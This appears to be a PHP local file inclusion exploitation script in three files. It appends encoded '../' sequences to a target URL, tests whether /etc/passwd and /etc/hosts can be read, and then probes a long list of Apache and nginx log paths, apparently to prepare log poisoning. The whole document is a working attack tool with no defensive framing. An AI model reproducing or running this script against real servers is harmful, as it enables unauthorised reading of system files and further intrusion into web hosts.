//Lfi.php - Main file<?php //LFI exploitation script require("funcs

1. //Lfi.php - Main file
2.  
3. <?php
4.  
5.     //LFI exploitation script
6.    
7.     require("funcs.php");
8.     require("dirs.php");
9.     $url = $_GET['u']; 
10.  
11.     define(LIM, 10);    //Limit of ../ to check
12.     define(RET, "..%2F");  
13.    
14.     $toInject = $url;
15.    
16.    
17.            
18.     //Main loop to append ../
19.     for($c = 1; $c < LIM; $c++){
20.         $toInject = $toInject.RET; //Url with ../ appended
21.        
22.         $passwdTest = searchPasswd($toInject);  //Buscamos passwd
23.         $hostsTest = searchHosts($toInject);    //Buscamos etc/hosts
24.        
25.         if($passwdTest || $hostsTest){
26.             echo $passwdTest."    ".$hostsTest;
27.             testLogs($toInject, $logsDir);
28.             die;
29.             }
30.            
31.     }
32.  
33. ?>
34.  
35. //funs.php - Functions file
36.  
37. <?php
38.  
39. //This functions returns body of $url
40.     function getBody($url){
41.         $ch = curl_init();
42.         curl_setopt($ch, CURLOPT_URL, $url);
43.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
44.         curl_setopt($ch, CURLOPT_VERBOSE, 1);
45.         curl_setopt($ch, CURLOPT_HEADER, 1);
46.         curl_setopt($ch, CURLOPT_USERAGENT, $ua);
47.         curl_setopt($ch, CURLOPT_FAILONERROR, True);
48.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, True);
49.         curl_setopt($ch, CURLOPT_AUTOREFERER, True);
50.         curl_setopt($ch, CURLOPT_TIMEOUT, 10);
51.         curl_setopt($ch, CURLOPT_ENCODING, '');
52.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
53.        
54.         $body = curl_exec($ch);
55.        
56.         return $body;
57.         }
58.        
59.     //This functions returns response size
60.     function getResponseSize($url){
61.         $ch = curl_init();
62.         curl_setopt($ch, CURLOPT_URL, $url);
63.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
64.         curl_setopt($ch, CURLOPT_VERBOSE, 1);
65.         curl_setopt($ch, CURLOPT_HEADER, 1);
66.         curl_setopt($ch, CURLOPT_USERAGENT, $ua);
67.         curl_setopt($ch, CURLOPT_FAILONERROR, True);
68.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, True);
69.         curl_setopt($ch, CURLOPT_AUTOREFERER, True);
70.         curl_setopt($ch, CURLOPT_TIMEOUT, 10);
71.         curl_setopt($ch, CURLOPT_ENCODING, '');
72.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
73.        
74.         curl_exec($ch);
75.         $info = curl_getinfo($ch);
76.        
77.         return $info['size_download'];
78.         }
79.        
80.     //This functions checks if /etc/passwd is accessible
81.     function searchPasswd($url){
82.         $passwd = "etc/passwd";
83.         $nb = "%00";
84.         $toReq = $url.$passwd;//.$nb;
85.         $root = "root:x:0:0:root:/root:/bin/bash";
86.         $body = getBody($toReq);
87.         //echo $toReq."<br>";
88.        
89.         if(strpos($body, $root)) return $toReq;//echo $toReq."<br>";
90.            
91.        
92.     }
93.    
94.     //This functions checks if /etc/hosts is accesible
95.     function searchHosts($url){
96.         $hosts = "etc/hosts";  
97.         $nb = "%00";
98.         $toReq = $url.$hosts;//.$nb;
99.        
100.         $ip = "127.0.0.1";
101.         $host = "localhost";
102.         $body = getBody($toReq);
103.        
104.        
105.         if(strpos($body, $ip)   && strpos($body, $host)) return $toReq;//echo $toReq."<br>";
106.            
107.     }
108.    
109.     function testLogs($url, &$logsDir){
110.         echo "<br>";
111.         foreach ($logsDir as $dir):
112.             $currentTest = $url.$dir;   //Url with returns with log appended
113.             echo getResponseSize($currentTest)."<br>";
114.         endforeach;
115.     }
116. ?>
117.  
118. //dirs.php - This file contains common Apache directories
119.  
120. <?php
121.  
122. //This file contains an array with common logs directories
123. $logsDir = array('error.log',
124.                 'error_log',
125.                 'etc/httpd/conf/logs/error_log',
126.                 'etc/httpd/logs/error_log',
127.                 'home/php5/logs/error_log',
128.                 'log/error.log',
129.                 'log/error_log',
130.                 'logs/error.log',
131.                 'logs/error_log',
132.                 'usr/local/apache/error.log',
133.                 'usr/local/apache/log/error_log',
134.                 'usr/local/apache/logs/error_log',
135.                 'usr/local/apache2/log/error_log',
136.                 'usr/local/apache2/logs/access_log',
137.                 'usr/local/apache2/logs/error.log',
138.                 'usr/local/apache2/logs/error_log',
139.                 'usr/local/apachessl/logs/error_log',
140.                 'usr/local/httpd/log/error_log',
141.                 'usr/local/httpd/logs/error_log',
142.                 'usr/local/php/log/error_log',
143.                 'var/apache2/logs/access_log',
144.                 'var/apache2/logs/error_log',
145.                 'var/log/apache/error_log',
146.                 'var/log/apache2/access.log',
147.                 'var/log/apache2/access_log',
148.                 'var/log/apache2/error.log',
149.                 'var/log/apache2/error_log',
150.                 'var/log/httpd-access.log',
151.                 'var/log/httpd-error.log',
152.                 'var/log/httpd/access_log',
153.                 'var/log/httpd/error_log',
154.                 'var/log/nginx/error.log',
155.                 'var/log/php-fcgi/error_log',
156.                 'var/log/php-fpm/err.log',
157.                 'var/www/logs/access_log',
158.                 'var/www/logs/error_log');
159. ?>